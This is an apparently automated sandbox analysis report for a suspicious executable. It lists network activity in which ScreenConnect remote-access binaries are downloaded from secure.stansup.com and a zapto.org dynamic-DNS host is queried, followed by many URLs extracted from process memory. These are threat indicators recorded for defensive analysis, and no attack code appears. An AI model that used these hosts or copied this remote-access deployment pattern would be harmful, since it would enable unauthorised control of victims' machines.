                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficDNS traffic detected: DNS query: secure.stansup.com
                  Source: global trafficDNS traffic detected: DNS query: kjh231a.zapto.org
                  Source: svchost.exe, 00000007.00000003.2203491408.000002487B579000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285589879.000002487B537000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS
                  Source: svchost.exe, 00000007.00000002.3285828510.000002487BC3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS</ds:KeyName></ds:KeyInfo><Ciph
                  Source: svchost.exe, 00000007.00000002.3285628178.000002487B55F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd
                  Source: svchost.exe, 00000007.00000003.2186905900.000002487B53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285503352.000002487B500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3284820423.000002487AC74000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285589879.000002487B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2281238846.000002487BCFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb
                  Source: svchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2281301768.000002487BC09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285785350.000002487BC0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb:pp
                  Source: svchost.exe, 00000007.00000002.3285134135.000002487ACC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb_
                  Source: 3coxOaV92n.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: C56C4404C4DEF0DC88E5FCD9F09CB2F10.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt
                  Source: 3coxOaV92n.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                  Source: 3coxOaV92n.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: F2E248BEDDBB2D85122423C41028BFD40.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
                  Source: 3coxOaV92n.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: svchost.exe, 00000006.00000002.3287569710.00000246CF8B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285134135.000002487ACDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                  Source: 3coxOaV92n.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: dfsvc.exe, 00000001.00000002.2923701714.000002A175B7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl
                  Source: 3coxOaV92n.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                  Source: 3coxOaV92n.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: 3coxOaV92n.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                  Source: dfsvc.exe, 00000001.00000002.2923701714.000002A175B7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crlP
                  Source: dfsvc.exe, 00000001.00000002.2923392693.000002A175AEF000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: svchost.exe, 00000007.00000003.2281301768.000002487BC09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285785350.000002487BC0A000.00000004.00000020.00020000.00000000.sdmp, 57C8EDB95DF3F0AD4EE2DC2B8CFD4157.7.dr, 57C8EDB95DF3F0AD4EE2DC2B8CFD41570.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
                  Source: dfsvc.exe, 00000001.00000002.2921558850.000002A1740E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?2d67091
                  Source: dfsvc.exe, 00000001.00000002.2923392693.000002A175AEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en6
                  Source: svchost.exe, 00000007.00000003.2203602585.000002487BCB2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2166034498.000002487B510000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2165600632.000002487B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285503352.000002487B500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2165712864.000002487B510000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2166852109.000002487B50E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2277886362.000002487BCB4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2165629059.000002487B50E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2186944592.000002487B50E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2166897807.000002487B50E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285628178.000002487B55F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2167337468.000002487B50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                  Source: svchost.exe, 00000007.00000003.2186587664.000002487B529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAAA
                  Source: svchost.exe, 00000007.00000002.3285628178.000002487B55F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdnc#
                  Source: svchost.exe, 00000007.00000003.2091573425.000002487B552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdng
                  Source: svchost.exe, 00000007.00000003.2091573425.000002487B552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdxmlns:
                  Source: svchost.exe, 00000007.00000003.2166034498.000002487B510000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2165600632.000002487B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285503352.000002487B500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2165712864.000002487B510000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2166852109.000002487B50E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2165629059.000002487B50E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2186944592.000002487B50E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2166897807.000002487B50E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285628178.000002487B55F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2167337468.000002487B50E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                  Source: svchost.exe, 00000007.00000002.3285628178.000002487B55F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd2001
                  Source: svchost.exe, 00000007.00000003.2091573425.000002487B552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd4/xml
                  Source: svchost.exe, 00000007.00000003.2186587664.000002487B529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285628178.000002487B55F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAA
                  Source: svchost.exe, 00000007.00000003.2186587664.000002487B529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAA
                  Source: svchost.exe, 00000007.00000002.3285628178.000002487B55F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdOAPF
                  Source: svchost.exe, 00000007.00000002.3285628178.000002487B55F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds/www
                  Source: svchost.exe, 00000007.00000003.2091573425.000002487B552000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdst=
                  Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                  Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                  Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                  Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                  Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                  Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                  Source: edb.log.6.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                  Source: C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F1410.1.drString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxX
                  Source: 3coxOaV92n.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: 3coxOaV92n.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: 3coxOaV92n.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: 3coxOaV92n.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0X
                  Source: dfsvc.exe, 00000001.00000002.2922992654.000002A175A8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
                  Source: dfsvc.exe, 00000001.00000002.2923701714.000002A175B7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crl
                  Source: svchost.exe, 00000007.00000002.3286034426.000002487BCA3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2281301768.000002487BC09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285785350.000002487BC0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://passport.net/tb
                  Source: svchost.exe, 00000007.00000002.3285628178.000002487B55F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                  Source: svchost.exe, 00000007.00000003.2186905900.000002487B53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285589879.000002487B537000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                  Source: svchost.exe, 00000007.00000003.2186587664.000002487B529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285628178.000002487B55F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285536041.000002487B513000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2167296900.000002487B569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                  Source: svchost.exe, 00000007.00000003.2186905900.000002487B53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285536041.000002487B513000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                  Source: svchost.exe, 00000007.00000002.3285628178.000002487B55F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scR
                  Source: svchost.exe, 00000007.00000002.3285536041.000002487B513000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scicy
                  Source: svchost.exe, 00000007.00000002.3285628178.000002487B55F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                  Source: svchost.exe, 00000007.00000003.2167296900.000002487B569000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2281238846.000002487BCFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                  Source: svchost.exe, 00000007.00000002.3285628178.000002487B55F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue502
                  Source: svchost.exe, 00000007.00000003.2186905900.000002487B53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285628178.000002487B55F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2167296900.000002487B569000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285900941.000002487BC5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                  Source: svchost.exe, 00000007.00000002.3285628178.000002487B55F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                  Source: svchost.exe, 00000007.00000002.3285536041.000002487B513000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trustm
                  Source: dfsvc.exe, 00000001.00000002.2909498559.000002A10001A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.3288065688.00000000019DF000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.2474543224.0000000002D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: dfsvc.exe, 00000001.00000002.2909498559.000002A100628000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A1003C1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A10073A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A100694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.stansup.com
                  Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
                  Source: 3coxOaV92n.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: dfsvc.exe, 00000001.00000002.2909498559.000002A10051A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A1003C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.o
                  Source: dfsvc.exe, 00000001.00000002.2909498559.000002A10051A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A1005A4000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A10053D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A1002EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.or
                  Source: dfsvc.exe, 00000001.00000002.2909498559.000002A10008D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2core
                  Source: dfsvc.exe, 00000001.00000002.2909498559.000002A10008D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2coreS
                  Source: svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.
                  Source: svchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.co
                  Source: svchost.exe, 00000007.00000003.2063530764.000002487B54D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
                  Source: svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502ssuer
                  Source: svchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063530764.000002487B54D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063263833.000002487B529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063376488.000002487B552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063801470.000002487B556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063263833.000002487B52C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
                  Source: svchost.exe, 00000007.00000003.2063263833.000002487B529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                  Source: svchost.exe, 00000007.00000003.2063263833.000002487B529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063376488.000002487B552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063801470.000002487B556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                  Source: svchost.exe, 00000007.00000003.2063263833.000002487B529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063376488.000002487B552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063801470.000002487B556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                  Source: svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063263833.000002487B529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063376488.000002487B552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063801470.000002487B556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                  Source: svchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063263833.000002487B529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063376488.000002487B552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063801470.000002487B556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                  Source: svchost.exe, 00000007.00000003.2063530764.000002487B54D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                  Source: svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600ssuer
                  Source: svchost.exe, 00000007.00000003.2063530764.000002487B54D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                  Source: svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601ssuer
                  Source: svchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063530764.000002487B54D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
